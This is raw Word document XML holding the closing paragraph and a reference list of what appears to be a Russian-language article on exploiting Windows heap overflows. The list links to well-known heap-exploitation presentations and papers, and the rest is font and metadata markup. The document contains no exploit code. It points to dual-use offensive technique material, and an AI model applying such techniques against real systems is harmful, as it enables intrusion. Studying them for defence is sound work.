          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>ку</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>щего контекста в целевом приложени</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> и ограничений, которые он несёт, являются ключом для понимания, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>существует</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ли возможность эксплуации переполнения. Механизмы защиты, введённые Microsoft предотвращают большинство </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">стандартных </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">способов переполнения, однако периодически мы можем видеть как в некоторых приложениях возникают условия, позволяющие атакующему </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>их</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> использовать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Ссылки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://windbg.info/doc/1-common-cmds.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://www.insomniasec.com/publications/Heaps_About_Heaps.ppt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://cybertech.net/~sh0ksh0k/projects/winheap/XPSP2 Heap Exploitation.ppt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- some small aspects from: http://illmatics.com/Understanding_the_LFH.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://www.insomniasec.com/publications/Exploiting_Freelist[0]_On_XPSP2.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://www.insomniasec.com/publications/DEPinDepth.ppt (heap segment information)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Advanced windows Debugging (Mario Hewardt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- www.ptsecurity.com/download/defeating-xpsp2-heap-protection.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://grey-corner.blogspot.com/2010/12/introducing-vulnserver.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- http://www.immunityinc.com/downloads/immunity_win32_exploitation.final2.ppt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Understanding and bypassing Windows Heap Protection by Nicolas Waisman (2007): http://kkamagui.springnote.com/pages/1350732/attachments/579350</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imbus Mono PS">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Nimbus Mono PS:-liga">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Nimbus Mono PS:-liga">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Free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urce Han Sans CN"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Source Han Sans CN"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Source Han Sans C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LibreOffice/6.3.5.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <Pages>29</Pages>
  <Words>4130</Words>
  <Characters>26591</Characters>
  <CharactersWithSpaces>31008</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2020-04-27T12:35:57Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-29T12:06:32Z</dcterms:modified>
  <cp:revision>48</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>